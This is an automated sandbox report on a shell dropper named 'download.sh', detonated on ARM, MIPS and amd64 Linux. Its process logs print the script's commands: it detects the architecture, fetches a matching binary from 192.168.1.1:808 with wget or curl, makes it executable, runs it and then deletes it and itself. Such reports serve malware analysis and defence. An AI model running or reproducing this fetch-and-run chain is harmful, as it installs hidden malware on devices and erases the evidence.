Malware Analysis Report

2025-01-23 15:27

Sample ID 240417-scd1csef6x
Target download.sh
SHA256 f2f9ca9ff0cb7eed58c756649005c78fe847c56c2ba415d15dd8abbd07a3e10f
Tags
antivm
score
6/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
6/10

SHA256

f2f9ca9ff0cb7eed58c756649005c78fe847c56c2ba415d15dd8abbd07a3e10f

Threat Level: Shows suspicious behavior

The file download.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

antivm

Checks CPU configuration

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-17 14:58

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-17 14:58

Reported

2024-04-17 15:01

Platform

debian9-armhf-20240226-en

Max time kernel

145s

Max time network

152s

Command Line

[/tmp/download.sh]

Signatures

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/bin/uname

[uname -s]

/bin/uname

[uname -m]

/usr/bin/wget

[wget -t 1 http://192.168.1.1:808/linux_arm7]

/usr/bin/curl

[curl -O --connect-timeout 10 http://192.168.1.1:808/linux_arm7]

/bin/chmod

[chmod +x linux_arm7]

/tmp/linux_arm7

[./linux_arm7]

/bin/rm

[rm -f linux_arm7]

/bin/rm

[/bin/rm /tmp/download.sh]

Network

Country Destination Domain Proto
N/A 192.168.1.1:808 tcp
N/A 192.168.1.1:808 tcp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-04-17 14:58

Reported

2024-04-17 15:01

Platform

debian9-mipsbe-20240226-en

Max time kernel

140s

Max time network

149s

Command Line

[/tmp/download.sh]

Signatures

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/bin/uname

[uname -s]

/bin/uname

[uname -m]

/usr/bin/wget

[wget -t 1 http://192.168.1.1:808/linux_mips]

/usr/bin/curl

[curl -O --connect-timeout 10 http://192.168.1.1:808/linux_mips]

/bin/chmod

[chmod +x linux_mips]

/tmp/linux_mips

[./linux_mips]

/bin/rm

[rm -f linux_mips]

/usr/bin/wget

[wget -t 1 http://192.168.1.1:808/linux_mipsel]

Network

Country Destination Domain Proto
N/A 192.168.1.1:808 tcp
N/A 192.168.1.1:808 tcp
N/A 192.168.1.1:808 tcp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-04-17 14:58

Reported

2024-04-17 15:01

Platform

debian9-mipsel-20240226-en

Max time kernel

149s

Max time network

151s

Command Line

[/tmp/download.sh]

Signatures

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/bin/uname

[uname -s]

/bin/uname

[uname -m]

/usr/bin/wget

[wget -t 1 http://192.168.1.1:808/linux_mips]

/usr/bin/curl

[curl -O --connect-timeout 10 http://192.168.1.1:808/linux_mips]

/bin/chmod

[chmod +x linux_mips]

/tmp/linux_mips

[./linux_mips]

/bin/rm

[rm -f linux_mips]

/usr/bin/wget

[wget -t 1 http://192.168.1.1:808/linux_mipsel]

/usr/bin/curl

[curl -O --connect-timeout 10 http://192.168.1.1:808/linux_mipsel]

Network

Country Destination Domain Proto
N/A 192.168.1.1:808 tcp
N/A 192.168.1.1:808 tcp
N/A 192.168.1.1:808 tcp
N/A 192.168.1.1:808 tcp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-17 14:58

Reported

2024-04-17 15:01

Platform

ubuntu1804-amd64-20240226-en

Max time kernel

140s

Max time network

141s

Command Line

[/tmp/download.sh]

Signatures

N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/bin/uname

[uname -s]

/bin/uname

[uname -m]

/usr/bin/wget

[wget -t 1 http://192.168.1.1:808/linux_amd64]

/usr/bin/curl

[curl -O --connect-timeout 10 http://192.168.1.1:808/linux_amd64]

/bin/chmod

[chmod +x linux_amd64]

/tmp/linux_amd64

[./linux_amd64]

/bin/rm

[rm -f linux_amd64]

/bin/rm

[/bin/rm /tmp/download.sh]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
N/A 192.168.1.1:808 tcp
US 151.101.2.49:443 tcp
US 1.1.1.1:53 cdn.fwupd.org udp
US 1.1.1.1:53 cdn.fwupd.org udp
US 151.101.130.49:443 cdn.fwupd.org tcp
US 151.101.193.91:443 tcp
GB 195.181.164.14:443 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.193.91:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 195.181.164.14:443 1527653184.rsc.cdn77.org tcp
N/A 192.168.1.1:808 tcp

Files

N/A